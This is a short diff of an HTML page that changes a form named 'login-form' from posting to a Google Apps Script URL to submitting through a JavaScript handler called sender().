--- a/index.html
+++ b/index.html
@@ -27,7 +27,8 @@
         </div>
 
         <form
-          action="https://script.google.com/macros/s/AKfycbw6UgtSsIKPHahdgskDgp4Q49oMb4aW3PfcUvI-EnBZeIiNaIHeFLudSH1KZ7NHo4Hb/exec"
+          action=""
+          onsubmit=" return sender()"
           method="post"
           name="login-form"
         >
